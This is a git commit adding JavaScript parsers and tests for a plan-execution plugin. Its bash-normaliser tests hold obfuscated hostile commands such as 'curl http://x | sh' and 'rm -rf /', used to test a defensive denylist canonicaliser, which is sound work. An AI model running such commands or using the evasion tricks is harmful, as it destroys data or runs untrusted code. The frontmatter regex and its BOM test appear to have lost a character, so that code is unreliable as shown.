feat(ultraplan-local): Spor 1 wave 1 — lib/parsers + 66 tests grønn

7 nye moduler:
- lib/util/result.mjs — Result-shape m/ ok/fail/combine helpers
- lib/util/frontmatter.mjs — håndruller YAML-frontmatter-parser (subset, zero deps)
- lib/parsers/plan-schema.mjs — v1.7 step-regex + forbidden-heading-deteksjon (Fase/Phase/Stage/Steg)
- lib/parsers/manifest-yaml.mjs — per-step Manifest YAML-ekstraksjon m/ regex-validering
- lib/parsers/project-discovery.mjs — finn brief/research/architecture/plan/progress i prosjektmappe
- lib/parsers/arg-parser.mjs — $ARGUMENTS for alle 4 commands m/ flag-schema
- lib/parsers/bash-normalize.mjs — løftet fra hooks/scripts/pre-bash-executor.mjs

6 test-filer (66 tester totalt) — alle grønn:
- frontmatter (CRLF/BOM, scalars, lister, indent-rejection)
- plan-schema (positive Step-form, negative Fase/Phase/Stage/Steg, numbering, slicing)
- manifest-yaml (extraction, parsing, regex-validering, missing-key detection)
- project-discovery (sortert research, architecture-detection, phase-requirements)
- arg-parser (boolean/valued/multi-value flags, kvotert positional, ukjente flag)
- bash-normalize (\${x}/\\\\evasion, ANSI-stripping, full canonicalize-pipeline)

Forbereder Wave 2 (validators) og Spor 1-wiring inn i commands.

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>
This commit is contained in:
Kjell Tore Guttormsen 2026-05-01 05:35:28 +02:00
commit 205cdbf77f
13 changed files with 1224 additions and 0 deletions

View file

@ -0,0 +1,117 @@
// lib/parsers/arg-parser.mjs
// Parse $ARGUMENTS strings for the four ultra commands.
//
// Each command has its own valid-flag set; passing flags from another command
// produces an `unknown_flags` array but does not error — the caller decides.
const FLAG_SCHEMA = {
ultrabrief: {
boolean: ['--quick', '--fg'],
valued: [],
aliases: {},
},
ultraresearch: {
boolean: ['--quick', '--local', '--external', '--fg'],
valued: ['--project'],
aliases: {},
},
ultraplan: {
boolean: ['--quick', '--fg'],
valued: ['--project', '--brief', '--export', '--decompose'],
multi: ['--research'],
aliases: {},
},
ultraexecute: {
boolean: ['--resume', '--dry-run', '--validate', '--fg'],
valued: ['--project', '--step', '--session'],
aliases: {},
},
};
/**
* @param {string} argString Raw $ARGUMENTS as the command sees it.
* @param {keyof FLAG_SCHEMA} command
* @returns {{
* command: string,
* flags: Record<string, true | string | string[]>,
* positional: string[],
* unknown: string[],
* errors: Array<{code: string, message: string}>,
* }}
*/
export function parseArgs(argString, command) {
const schema = FLAG_SCHEMA[command];
if (!schema) {
return {
command,
flags: {},
positional: [],
unknown: [],
errors: [{ code: 'ARG_UNKNOWN_COMMAND', message: `Unknown command: ${command}` }],
};
}
const tokens = tokenize(argString);
const flags = {};
const positional = [];
const unknown = [];
const errors = [];
for (let i = 0; i < tokens.length; i++) {
const tok = tokens[i];
if (!tok.startsWith('--')) {
positional.push(tok);
continue;
}
if (schema.boolean.includes(tok)) {
flags[tok] = true;
continue;
}
if (schema.valued.includes(tok)) {
const next = tokens[i + 1];
if (next === undefined || next.startsWith('--')) {
errors.push({ code: 'ARG_MISSING_VALUE', message: `Flag ${tok} requires a value` });
} else {
flags[tok] = next;
i++;
}
continue;
}
if (schema.multi && schema.multi.includes(tok)) {
const collected = [];
while (i + 1 < tokens.length && !tokens[i + 1].startsWith('--')) {
collected.push(tokens[i + 1]);
i++;
}
if (collected.length === 0) {
errors.push({ code: 'ARG_MISSING_VALUE', message: `Flag ${tok} requires at least one value` });
} else {
flags[tok] = collected;
}
continue;
}
unknown.push(tok);
}
return { command, flags, positional, unknown, errors };
}
function tokenize(s) {
if (typeof s !== 'string') return [];
const trimmed = s.trim();
if (trimmed === '') return [];
const out = [];
const re = /"([^"]*)"|'([^']*)'|(\S+)/g;
let m;
while ((m = re.exec(trimmed)) !== null) {
out.push(m[1] !== undefined ? m[1] : m[2] !== undefined ? m[2] : m[3]);
}
return out;
}
export { FLAG_SCHEMA };

View file

@ -0,0 +1,48 @@
// lib/parsers/bash-normalize.mjs
// Bash-evasion normalization, lifted from hooks/scripts/pre-bash-executor.mjs.
//
// Source: ../../hooks/scripts/pre-bash-executor.mjs (lines 22-45) — verbatim
// extraction so the runtime hook and the test suite share one implementation.
// The hook still inlines a copy because it cannot import from outside the
// plugin distribution at this time; both copies must stay in sync.
/**
* Strip bash evasion techniques: empty quotes, ${} expansion, backslash splitting.
* Used to canonicalize a command before running denylist regex over it.
*/
export function normalizeBashExpansion(cmd) {
if (typeof cmd !== 'string' || cmd === '') return '';
let result = cmd
.replace(/''/g, '')
.replace(/""/g, '')
.replace(/\$\{(\w)\}/g, '$1')
.replace(/\$\{[^}]*\}/g, '')
.replace(/`\s*`/g, '');
let prev;
do {
prev = result;
result = result.replace(/(\w)\\(\w)/g, '$1$2');
} while (result !== prev);
return result;
}
/**
* Strip ANSI escape codes and collapse whitespace.
*/
export function normalizeCommand(cmd) {
if (typeof cmd !== 'string') return '';
return cmd
.replace(/\x1B\[[0-9;]*m/g, '')
.replace(/\s+/g, ' ')
.trim();
}
/**
* Full canonicalization pipeline used by hooks before pattern matching.
*/
export function canonicalize(cmd) {
return normalizeCommand(normalizeBashExpansion(cmd));
}

View file

@ -0,0 +1,118 @@
// lib/parsers/manifest-yaml.mjs
// Extract the `manifest:` YAML block from each step body.
//
// Plan v1.7 contract: every step has a fenced ```yaml ... ``` block whose
// top-level key is `manifest:` and which contains the keys:
// expected_paths, min_file_count, commit_message_pattern, bash_syntax_check,
// forbidden_paths, must_contain.
import { issue, ok, fail } from '../util/result.mjs';
import { parseFrontmatter } from '../util/frontmatter.mjs';
const FENCED_YAML_RE = /```ya?ml\s*\n([\s\S]*?)\n[ \t]*```/g;
const REQUIRED_KEYS = [
'expected_paths',
'min_file_count',
'commit_message_pattern',
'bash_syntax_check',
'forbidden_paths',
'must_contain',
];
/**
* Extract the first fenced YAML block whose first non-blank line begins with
* `manifest:`.
* @returns {string|null} Inner YAML body without the leading `manifest:` line.
*/
export function extractManifestYaml(stepBody) {
if (typeof stepBody !== 'string') return null;
FENCED_YAML_RE.lastIndex = 0;
let m;
while ((m = FENCED_YAML_RE.exec(stepBody)) !== null) {
const block = m[1];
const firstNonBlank = block.split(/\r?\n/).find(l => l.trim() !== '');
if (firstNonBlank && /^manifest\s*:/.test(firstNonBlank.trim())) {
const after = block.replace(/^[\s\S]*?manifest[ \t]*:[ \t]*\n?/, '');
return after;
}
}
return null;
}
/**
* Parse a single step's manifest into an object.
* Reuses the frontmatter parser (same restricted YAML subset).
* @returns {import('../util/result.mjs').Result}
*/
export function parseManifest(stepBody) {
const yamlText = extractManifestYaml(stepBody);
if (yamlText === null) {
return fail(issue('MANIFEST_MISSING', 'No `manifest:` YAML block found in step body'));
}
const dedented = dedent(yamlText);
const result = parseFrontmatter(dedented);
if (!result.valid) return result;
const errors = [];
const warnings = [];
const parsed = result.parsed || {};
for (const k of REQUIRED_KEYS) {
if (!(k in parsed)) {
errors.push(issue('MANIFEST_MISSING_KEY', `Manifest is missing required key: ${k}`));
}
}
if ('commit_message_pattern' in parsed) {
const pat = parsed.commit_message_pattern;
if (typeof pat !== 'string') {
errors.push(issue('MANIFEST_PATTERN_TYPE', 'commit_message_pattern must be a string'));
} else {
try { new RegExp(pat); }
catch (e) {
errors.push(issue('MANIFEST_PATTERN_INVALID', `commit_message_pattern is not a valid regex: ${e.message}`));
}
}
}
if ('expected_paths' in parsed && !Array.isArray(parsed.expected_paths)) {
errors.push(issue('MANIFEST_PATHS_TYPE', 'expected_paths must be a list'));
}
if ('min_file_count' in parsed && typeof parsed.min_file_count !== 'number') {
errors.push(issue('MANIFEST_COUNT_TYPE', 'min_file_count must be a number'));
}
return { valid: errors.length === 0, errors, warnings, parsed };
}
function dedent(text) {
const lines = text.split(/\r?\n/);
const indents = lines
.filter(l => l.trim() !== '')
.map(l => (l.match(/^(\s*)/) || ['', ''])[1].length);
if (indents.length === 0) return text;
const min = Math.min(...indents);
if (min === 0) return text;
return lines.map(l => l.slice(min)).join('\n');
}
/**
* Validate every step in a parsed plan has a manifest.
* @param {Array<{n: number, body: string}>} steps
* @returns {import('../util/result.mjs').Result}
*/
export function validateAllManifests(steps) {
const errors = [];
const warnings = [];
const parsed = [];
for (const s of steps) {
const r = parseManifest(s.body);
if (!r.valid) {
for (const e of r.errors) errors.push(issue(e.code, `Step ${s.n}: ${e.message}`, e.hint));
}
parsed.push({ n: s.n, manifest: r.parsed, valid: r.valid });
}
return { valid: errors.length === 0, errors, warnings, parsed };
}

View file

@ -0,0 +1,126 @@
// lib/parsers/plan-schema.mjs
// Plan v1.7 schema parser — heading shape detection.
//
// The canonical step heading is `### Step N: <title>` (literal colon-space).
// Forbidden narrative drift formats (introduced in v1.8.0 to defend against
// Opus 4.7 schema-drift): `## Fase N`, `### Phase N`, `### Stage N`, `### Steg N`.
//
// This module extracts step boundaries; per-step body parsing lives elsewhere.
import { ok, fail, issue } from '../util/result.mjs';
export const STEP_HEADING_REGEX = /^### Step (\d+):\s+(.+?)\s*$/m;
export const STEP_HEADING_GLOBAL = /^### Step (\d+):\s+(.+?)\s*$/gm;
export const FORBIDDEN_HEADING_REGEX = /^(?:##|###) (?:Fase|Phase|Stage|Steg) \d+/m;
export const FORBIDDEN_HEADING_GLOBAL = /^(?:##|###) (?:Fase|Phase|Stage|Steg) \d+/gm;
export const PLAN_VERSION_REGEX = /^plan_version:\s*['"]?([\d.]+)['"]?/m;
/**
* Find all step heading positions in plan text.
* @returns {Array<{n: number, title: string, line: number, offset: number}>}
*/
export function findSteps(text) {
if (typeof text !== 'string') return [];
const out = [];
STEP_HEADING_GLOBAL.lastIndex = 0;
let m;
while ((m = STEP_HEADING_GLOBAL.exec(text)) !== null) {
const offset = m.index;
const line = text.slice(0, offset).split(/\r?\n/).length;
out.push({ n: Number.parseInt(m[1], 10), title: m[2].trim(), line, offset });
}
return out;
}
/**
* Find forbidden narrative-drift heading occurrences (Fase/Phase/Stage/Steg N).
* @returns {Array<{form: string, line: number, offset: number, raw: string}>}
*/
export function findForbiddenHeadings(text) {
if (typeof text !== 'string') return [];
const out = [];
FORBIDDEN_HEADING_GLOBAL.lastIndex = 0;
let m;
while ((m = FORBIDDEN_HEADING_GLOBAL.exec(text)) !== null) {
const offset = m.index;
const line = text.slice(0, offset).split(/\r?\n/).length;
const raw = m[0];
out.push({ form: raw, line, offset, raw });
}
return out;
}
/**
* Slice plan text into per-step sections.
* @returns {Array<{n: number, title: string, body: string, line: number}>}
*/
export function sliceSteps(text) {
const heads = findSteps(text);
const sections = [];
for (let i = 0; i < heads.length; i++) {
const start = heads[i].offset;
const end = i + 1 < heads.length ? heads[i + 1].offset : text.length;
const block = text.slice(start, end);
sections.push({
n: heads[i].n,
title: heads[i].title,
body: block,
line: heads[i].line,
});
}
return sections;
}
/**
* Extract `plan_version: X.Y` from frontmatter or doc body.
*/
export function extractPlanVersion(text) {
const m = typeof text === 'string' ? text.match(PLAN_VERSION_REGEX) : null;
return m ? m[1] : null;
}
/**
* Validate plan structure at the heading level.
* Strict mode: forbidden-heading count > 0 error. Step numbers must be 1..N contiguous.
* @returns {import('../util/result.mjs').Result}
*/
export function validatePlanHeadings(text, opts = {}) {
const strict = opts.strict !== false;
const errors = [];
const warnings = [];
if (typeof text !== 'string') {
return fail(issue('PLAN_INPUT', 'Plan text is not a string'));
}
const forbidden = findForbiddenHeadings(text);
if (forbidden.length > 0) {
const list = forbidden.map(f => `line ${f.line}: ${f.raw}`).join('; ');
const errorIssue = issue(
'PLAN_FORBIDDEN_HEADING',
`Found ${forbidden.length} forbidden narrative-drift heading(s): ${list}`,
'Use canonical "### Step N: <title>". Forbidden forms: Fase/Phase/Stage/Steg.',
);
if (strict) errors.push(errorIssue);
else warnings.push(errorIssue);
}
const steps = findSteps(text);
if (steps.length === 0) {
errors.push(issue('PLAN_NO_STEPS', 'No step headings found', 'Expected at least one "### Step 1: <title>".'));
} else {
const numbers = steps.map(s => s.n);
for (let i = 0; i < numbers.length; i++) {
if (numbers[i] !== i + 1) {
errors.push(issue(
'PLAN_STEP_NUMBERING',
`Step numbering breaks at position ${i + 1} (got Step ${numbers[i]})`,
'Steps must be 1..N contiguous and ordered.',
));
break;
}
}
}
return { valid: errors.length === 0, errors, warnings, parsed: { steps, forbidden } };
}

View file

@ -0,0 +1,89 @@
// lib/parsers/project-discovery.mjs
// Discover ultra-suite artifacts inside a project directory.
//
// Layout (post-v3.0.0 project-directory contract):
// .claude/projects/<YYYY-MM-DD>-<slug>/
// brief.md
// research/<NN>-<slug>.md (sorted by filename)
// architecture/overview.md (opt-in, owned by separate ultra-cc-architect plugin)
// plan.md
// progress.json
import { existsSync, readdirSync, statSync } from 'node:fs';
import { join } from 'node:path';
/**
* @typedef {{
* projectDir: string,
* brief: string|null,
* research: string[],
* architecture: { overview: string|null, gaps: string|null, looseFiles: string[] },
* plan: string|null,
* progress: string|null,
* }} ProjectArtifacts
*/
/** @returns {ProjectArtifacts} */
export function discoverProject(projectDir) {
const out = {
projectDir,
brief: null,
research: [],
architecture: { overview: null, gaps: null, looseFiles: [] },
plan: null,
progress: null,
};
if (!projectDir || !existsSync(projectDir) || !statSync(projectDir).isDirectory()) {
return out;
}
const briefPath = join(projectDir, 'brief.md');
if (existsSync(briefPath) && statSync(briefPath).isFile()) out.brief = briefPath;
const planPath = join(projectDir, 'plan.md');
if (existsSync(planPath) && statSync(planPath).isFile()) out.plan = planPath;
const progressPath = join(projectDir, 'progress.json');
if (existsSync(progressPath) && statSync(progressPath).isFile()) out.progress = progressPath;
const researchDir = join(projectDir, 'research');
if (existsSync(researchDir) && statSync(researchDir).isDirectory()) {
out.research = readdirSync(researchDir)
.filter(f => f.endsWith('.md'))
.sort()
.map(f => join(researchDir, f));
}
const archDir = join(projectDir, 'architecture');
if (existsSync(archDir) && statSync(archDir).isDirectory()) {
const overviewPath = join(archDir, 'overview.md');
const gapsPath = join(archDir, 'gaps.md');
if (existsSync(overviewPath)) out.architecture.overview = overviewPath;
if (existsSync(gapsPath)) out.architecture.gaps = gapsPath;
const all = readdirSync(archDir).filter(f => f.endsWith('.md'));
out.architecture.looseFiles = all
.filter(f => f !== 'overview.md' && f !== 'gaps.md')
.map(f => join(archDir, f));
}
return out;
}
/**
* Validate that artifact set is consistent for a given pipeline phase.
* Phase = 'brief' | 'research' | 'plan' | 'execute'.
*/
export function checkPhaseRequirements(artifacts, phase) {
const errors = [];
if (phase === 'research' && !artifacts.brief) {
errors.push({ code: 'PROJECT_NO_BRIEF', message: 'research phase requires brief.md' });
}
if (phase === 'plan' && !artifacts.brief) {
errors.push({ code: 'PROJECT_NO_BRIEF', message: 'plan phase requires brief.md' });
}
if (phase === 'execute' && !artifacts.plan) {
errors.push({ code: 'PROJECT_NO_PLAN', message: 'execute phase requires plan.md' });
}
return { valid: errors.length === 0, errors, warnings: [], parsed: artifacts };
}

View file

@ -0,0 +1,138 @@
// lib/util/frontmatter.mjs
// Hand-rolled YAML-frontmatter parser.
//
// Supported subset:
// - String scalars (quoted or unquoted)
// - Numbers (integer + float)
// - Booleans (true / false)
// - null
// - Single-level dicts
// - Lists of scalars (- value)
//
// Deliberately rejects: nested dicts in lists, multi-line strings,
// anchors/aliases, tags, flow style ({...} / [...]).
//
// Why no js-yaml: zero-deps invariant. Templates emit only this subset.
import { issue, ok, fail } from './result.mjs';
const FRONTMATTER_RE = /^?---\r?\n([\s\S]*?)\r?\n---(?:\r?\n([\s\S]*))?$/;
/**
* Split raw markdown into { frontmatter, body }.
* Returns { hasFrontmatter: false } when no leading --- block exists.
*/
export function splitFrontmatter(text) {
if (typeof text !== 'string') return { hasFrontmatter: false, body: '' };
const stripped = text.replace(/^/, '');
const m = stripped.match(/^---\r?\n([\s\S]*?)\r?\n---(?:\r?\n([\s\S]*))?$/);
if (!m) return { hasFrontmatter: false, body: stripped };
return {
hasFrontmatter: true,
frontmatter: m[1],
body: m[2] || '',
};
}
/**
* Parse a YAML-frontmatter string into a JS object.
* @returns {import('./result.mjs').Result}
*/
export function parseFrontmatter(yamlText) {
if (typeof yamlText !== 'string') {
return fail(issue('FM_INPUT', 'Frontmatter input is not a string'));
}
const lines = yamlText.split(/\r?\n/);
const out = {};
const errors = [];
let i = 0;
while (i < lines.length) {
const line = lines[i];
if (line.trim() === '' || line.trimStart().startsWith('#')) {
i++;
continue;
}
const indentMatch = line.match(/^(\s*)/);
const indent = indentMatch ? indentMatch[0].length : 0;
if (indent > 0) {
errors.push(issue('FM_INDENT', `Unexpected indentation at line ${i + 1}`, 'Top-level keys only; nested dicts unsupported.'));
i++;
continue;
}
const kv = line.match(/^([A-Za-z_][A-Za-z0-9_-]*)\s*:\s*(.*)$/);
if (!kv) {
errors.push(issue('FM_SYNTAX', `Cannot parse line ${i + 1}: ${line}`));
i++;
continue;
}
const key = kv[1];
const rest = kv[2];
if (rest === '' || rest === undefined) {
const list = [];
let j = i + 1;
while (j < lines.length) {
const next = lines[j];
if (next.trim() === '') { j++; continue; }
const m2 = next.match(/^\s+-\s+(.*)$/);
if (!m2) break;
list.push(parseScalar(m2[1]));
j++;
}
if (list.length > 0) {
out[key] = list;
i = j;
} else {
out[key] = null;
i++;
}
continue;
}
out[key] = parseScalar(rest);
i++;
}
if (errors.length > 0) return { valid: false, errors, warnings: [], parsed: out };
return ok(out);
}
function parseScalar(raw) {
const s = raw.trim();
if (s === '') return '';
if (s === 'null' || s === '~') return null;
if (s === 'true') return true;
if (s === 'false') return false;
if (s === '[]') return [];
if (s === '{}') return {};
if (/^-?\d+$/.test(s)) return Number.parseInt(s, 10);
if (/^-?\d+\.\d+$/.test(s)) return Number.parseFloat(s);
if (s.startsWith('"') && s.endsWith('"')) {
return s.slice(1, -1).replace(/\\(.)/g, (_, ch) => {
if (ch === 'n') return '\n';
if (ch === 't') return '\t';
if (ch === 'r') return '\r';
return ch;
});
}
if (s.startsWith("'") && s.endsWith("'")) return s.slice(1, -1);
return s;
}
/**
* Parse a markdown file's frontmatter directly from its full text.
* @returns {import('./result.mjs').Result}
*/
export function parseDocument(text) {
const split = splitFrontmatter(text);
if (!split.hasFrontmatter) {
return fail(issue('FM_MISSING', 'No frontmatter block found'));
}
const result = parseFrontmatter(split.frontmatter);
return { ...result, parsed: { frontmatter: result.parsed, body: split.body } };
}

View file

@ -0,0 +1,35 @@
// lib/util/result.mjs
// Validation result shape used by every validator and parser.
/**
* @typedef {{ code: string, message: string, hint?: string, location?: string }} Issue
* @typedef {{ valid: boolean, errors: Issue[], warnings: Issue[], parsed?: any }} Result
*/
/** @returns {Result} */
export function ok(parsed) {
return { valid: true, errors: [], warnings: [], parsed };
}
/** @returns {Result} */
export function fail(errors, parsed) {
return { valid: false, errors: Array.isArray(errors) ? errors : [errors], warnings: [], parsed };
}
/** @returns {Result} */
export function combine(results) {
const errors = [];
const warnings = [];
let parsed;
for (const r of results) {
if (r.errors) errors.push(...r.errors);
if (r.warnings) warnings.push(...r.warnings);
if (r.parsed !== undefined && parsed === undefined) parsed = r.parsed;
}
return { valid: errors.length === 0, errors, warnings, parsed };
}
/** @returns {Issue} */
export function issue(code, message, hint, location) {
return { code, message, hint, location };
}

View file

@ -0,0 +1,77 @@
import { test } from 'node:test';
import { strict as assert } from 'node:assert';
import { parseArgs } from '../../lib/parsers/arg-parser.mjs';
test('ultrabrief — empty args', () => {
const r = parseArgs('', 'ultrabrief');
assert.equal(r.command, 'ultrabrief');
assert.deepEqual(r.flags, {});
});
test('ultrabrief — --quick boolean', () => {
const r = parseArgs('--quick', 'ultrabrief');
assert.equal(r.flags['--quick'], true);
});
test('ultraresearch — --project value capture', () => {
const r = parseArgs('--project .claude/projects/2026-04-30-foo', 'ultraresearch');
assert.equal(r.flags['--project'], '.claude/projects/2026-04-30-foo');
});
test('ultraresearch — --quick --local combined', () => {
const r = parseArgs('--quick --local', 'ultraresearch');
assert.equal(r.flags['--quick'], true);
assert.equal(r.flags['--local'], true);
});
test('ultraplan — --research multi-value', () => {
const r = parseArgs('--research a.md b.md c.md', 'ultraplan');
assert.deepEqual(r.flags['--research'], ['a.md', 'b.md', 'c.md']);
});
test('ultraplan — --research multi stops at next flag', () => {
const r = parseArgs('--research a.md b.md --project /x', 'ultraplan');
assert.deepEqual(r.flags['--research'], ['a.md', 'b.md']);
assert.equal(r.flags['--project'], '/x');
});
test('ultraplan — --brief required-value flag', () => {
const r = parseArgs('--brief brief.md', 'ultraplan');
assert.equal(r.flags['--brief'], 'brief.md');
});
test('ultraplan — missing value for --brief produces error', () => {
const r = parseArgs('--brief --quick', 'ultraplan');
assert.ok(r.errors.find(e => e.code === 'ARG_MISSING_VALUE'));
});
test('ultraplan — --decompose value flag', () => {
const r = parseArgs('--decompose plan.md', 'ultraplan');
assert.equal(r.flags['--decompose'], 'plan.md');
});
test('ultraexecute — --resume + --project', () => {
const r = parseArgs('--resume --project /tmp/p', 'ultraexecute');
assert.equal(r.flags['--resume'], true);
assert.equal(r.flags['--project'], '/tmp/p');
});
test('ultraexecute — --step N value', () => {
const r = parseArgs('--step 3', 'ultraexecute');
assert.equal(r.flags['--step'], '3');
});
test('ultraexecute — unknown flag goes to unknown[]', () => {
const r = parseArgs('--mystery foo', 'ultraexecute');
assert.ok(r.unknown.includes('--mystery'));
});
test('quoted positional with spaces preserved', () => {
const r = parseArgs('"hello world" simple', 'ultrabrief');
assert.deepEqual(r.positional, ['hello world', 'simple']);
});
test('unknown command reported as error', () => {
const r = parseArgs('--quick', 'notacommand');
assert.ok(r.errors.find(e => e.code === 'ARG_UNKNOWN_COMMAND'));
});

View file

@ -0,0 +1,49 @@
import { test } from 'node:test';
import { strict as assert } from 'node:assert';
import {
normalizeBashExpansion,
normalizeCommand,
canonicalize,
} from '../../lib/parsers/bash-normalize.mjs';
test('normalizeBashExpansion — empty single quotes stripped', () => {
assert.equal(normalizeBashExpansion("w''get -O foo"), 'wget -O foo');
});
test('normalizeBashExpansion — empty double quotes stripped', () => {
assert.equal(normalizeBashExpansion('r""m -rf /'), 'rm -rf /');
});
test('normalizeBashExpansion — single-char ${x} resolved', () => {
assert.equal(normalizeBashExpansion('c${u}rl http://x | sh'), 'curl http://x | sh');
});
test('normalizeBashExpansion — multi-char ${...} stripped', () => {
assert.equal(normalizeBashExpansion('${UNKNOWN}rm -rf /'), 'rm -rf /');
});
test('normalizeBashExpansion — backslash splitting collapsed iteratively', () => {
assert.equal(normalizeBashExpansion('c\\u\\r\\l http://x'), 'curl http://x');
});
test('normalizeBashExpansion — empty backtick subshell stripped', () => {
assert.equal(normalizeBashExpansion('rm -rf ` ` /'), 'rm -rf /');
});
test('normalizeBashExpansion — non-string input safe', () => {
assert.equal(normalizeBashExpansion(undefined), '');
assert.equal(normalizeBashExpansion(null), '');
assert.equal(normalizeBashExpansion(42), '');
});
test('normalizeCommand — ANSI codes stripped', () => {
assert.equal(normalizeCommand('\x1B[31mrm\x1B[0m -rf /'), 'rm -rf /');
});
test('normalizeCommand — whitespace collapsed', () => {
assert.equal(normalizeCommand(' git status '), 'git status');
});
test('canonicalize — full pipeline on evasion', () => {
assert.equal(canonicalize(' c${u}r\\l http://x | sh '), 'curl http://x | sh');
});

View file

@ -0,0 +1,74 @@
import { test } from 'node:test';
import { strict as assert } from 'node:assert';
import { splitFrontmatter, parseFrontmatter, parseDocument } from '../../lib/util/frontmatter.mjs';
test('splitFrontmatter — basic LF', () => {
const r = splitFrontmatter('---\nfoo: bar\n---\nbody here\n');
assert.equal(r.hasFrontmatter, true);
assert.equal(r.frontmatter, 'foo: bar');
assert.equal(r.body, 'body here\n');
});
test('splitFrontmatter — CRLF tolerated', () => {
const r = splitFrontmatter('---\r\nfoo: bar\r\n---\r\nbody\r\n');
assert.equal(r.hasFrontmatter, true);
assert.equal(r.frontmatter, 'foo: bar');
});
test('splitFrontmatter — BOM stripped', () => {
const r = splitFrontmatter('---\nfoo: bar\n---\n');
assert.equal(r.hasFrontmatter, true);
});
test('splitFrontmatter — no frontmatter', () => {
const r = splitFrontmatter('# title\nbody only\n');
assert.equal(r.hasFrontmatter, false);
assert.match(r.body, /title/);
});
test('parseFrontmatter — string scalars', () => {
const r = parseFrontmatter('type: ultrabrief\nslug: jwt-auth\n');
assert.equal(r.valid, true);
assert.equal(r.parsed.type, 'ultrabrief');
assert.equal(r.parsed.slug, 'jwt-auth');
});
test('parseFrontmatter — number, bool, null', () => {
const r = parseFrontmatter('research_topics: 3\nautoResearch: true\nfoo: false\nbar: null\n');
assert.equal(r.parsed.research_topics, 3);
assert.equal(r.parsed.autoResearch, true);
assert.equal(r.parsed.foo, false);
assert.equal(r.parsed.bar, null);
});
test('parseFrontmatter — quoted strings', () => {
const r = parseFrontmatter('plan_version: "1.7"\nname: \'test thing\'\n');
assert.equal(r.parsed.plan_version, '1.7');
assert.equal(r.parsed.name, 'test thing');
});
test('parseFrontmatter — list of scalars', () => {
const r = parseFrontmatter('keywords:\n - planning\n - research\n - agents\n');
assert.equal(r.valid, true);
assert.deepEqual(r.parsed.keywords, ['planning', 'research', 'agents']);
});
test('parseFrontmatter — rejects nested dict', () => {
const r = parseFrontmatter('a: 1\n b: 2\n');
assert.equal(r.valid, false);
assert.ok(r.errors.find(e => e.code === 'FM_INDENT'));
});
test('parseDocument — full pipeline', () => {
const text = '---\ntype: ultrabrief\nresearch_topics: 2\n---\n\n# Body\n\ncontent\n';
const r = parseDocument(text);
assert.equal(r.valid, true);
assert.equal(r.parsed.frontmatter.type, 'ultrabrief');
assert.match(r.parsed.body, /content/);
});
test('parseDocument — missing frontmatter is an error', () => {
const r = parseDocument('# just markdown\nno frontmatter here\n');
assert.equal(r.valid, false);
assert.ok(r.errors.find(e => e.code === 'FM_MISSING'));
});

View file

@ -0,0 +1,110 @@
import { test } from 'node:test';
import { strict as assert } from 'node:assert';
import {
extractManifestYaml,
parseManifest,
validateAllManifests,
} from '../../lib/parsers/manifest-yaml.mjs';
const STEP_BODY_GOOD = `### Step 1: Add validator
- Files: lib/foo.mjs
- Verify: \`npm test\` → expected: pass
- Checkpoint: \`git commit -m "feat(lib): foo"\`
- Manifest:
\`\`\`yaml
manifest:
expected_paths:
- lib/foo.mjs
min_file_count: 1
commit_message_pattern: "^feat\\\\(lib\\\\):"
bash_syntax_check: []
forbidden_paths: []
must_contain: []
\`\`\`
`;
const STEP_BODY_NO_MANIFEST = `### Step 1: oops
no manifest here
`;
const STEP_BODY_INVALID_REGEX = `### Step 1: bad regex
- Manifest:
\`\`\`yaml
manifest:
expected_paths:
- x
min_file_count: 1
commit_message_pattern: "[unclosed"
bash_syntax_check: []
forbidden_paths: []
must_contain: []
\`\`\`
`;
test('extractManifestYaml — finds fenced manifest block', () => {
const yaml = extractManifestYaml(STEP_BODY_GOOD);
assert.ok(yaml);
assert.match(yaml, /expected_paths/);
});
test('extractManifestYaml — null when missing', () => {
assert.equal(extractManifestYaml(STEP_BODY_NO_MANIFEST), null);
});
test('parseManifest — happy path produces all required keys', () => {
const r = parseManifest(STEP_BODY_GOOD);
assert.equal(r.valid, true, JSON.stringify(r.errors));
assert.deepEqual(r.parsed.expected_paths, ['lib/foo.mjs']);
assert.equal(r.parsed.min_file_count, 1);
assert.match(r.parsed.commit_message_pattern, /^\^feat/);
});
test('parseManifest — missing manifest produces MANIFEST_MISSING', () => {
const r = parseManifest(STEP_BODY_NO_MANIFEST);
assert.equal(r.valid, false);
assert.ok(r.errors.find(e => e.code === 'MANIFEST_MISSING'));
});
test('parseManifest — invalid regex caught', () => {
const r = parseManifest(STEP_BODY_INVALID_REGEX);
assert.equal(r.valid, false);
assert.ok(r.errors.find(e => e.code === 'MANIFEST_PATTERN_INVALID'));
});
test('parseManifest — missing required key flagged', () => {
const noCount = `### Step 1
- Manifest:
\`\`\`yaml
manifest:
expected_paths:
- x
commit_message_pattern: "^x:"
bash_syntax_check: []
forbidden_paths: []
must_contain: []
\`\`\`
`;
const r = parseManifest(noCount);
assert.equal(r.valid, false);
assert.ok(r.errors.find(e => e.code === 'MANIFEST_MISSING_KEY' && /min_file_count/.test(e.message)));
});
test('parseManifest — commit_message_pattern compiles via new RegExp', () => {
const r = parseManifest(STEP_BODY_GOOD);
const re = new RegExp(r.parsed.commit_message_pattern);
assert.ok(re.test('feat(lib): added foo'));
assert.ok(!re.test('chore: not it'));
});
test('validateAllManifests — aggregates per-step issues', () => {
const steps = [
{ n: 1, body: STEP_BODY_GOOD },
{ n: 2, body: STEP_BODY_NO_MANIFEST },
];
const r = validateAllManifests(steps);
assert.equal(r.valid, false);
assert.ok(r.errors.find(e => /Step 2/.test(e.message)));
});

View file

@ -0,0 +1,137 @@
import { test } from 'node:test';
import { strict as assert } from 'node:assert';
import {
findSteps,
findForbiddenHeadings,
sliceSteps,
validatePlanHeadings,
extractPlanVersion,
} from '../../lib/parsers/plan-schema.mjs';
const GOOD_PLAN = `---
plan_version: "1.7"
---
## Implementation Plan
### Step 1: First step
- Files: a.ts
### Step 2: Second step
- Files: b.ts
### Step 3: Third step
- Files: c.ts
`;
const FORBIDDEN_FASE = `## Implementation Plan
## Fase 1: Forberedelse
content here
## Fase 2: Implementering
more content
`;
const FORBIDDEN_PHASE = `### Phase 1: Setup
content
`;
const FORBIDDEN_STAGE = `### Stage 1: Initial work
content
`;
const FORBIDDEN_STEG = `### Steg 1: Norsk drift
content
`;
test('findSteps — locates all canonical step headings', () => {
const steps = findSteps(GOOD_PLAN);
assert.equal(steps.length, 3);
assert.equal(steps[0].n, 1);
assert.equal(steps[0].title, 'First step');
assert.equal(steps[2].n, 3);
assert.equal(steps[2].title, 'Third step');
});
test('findSteps — empty for plan without steps', () => {
assert.deepEqual(findSteps('## Implementation Plan\n\nno steps yet'), []);
});
test('findForbiddenHeadings — Fase (Norwegian)', () => {
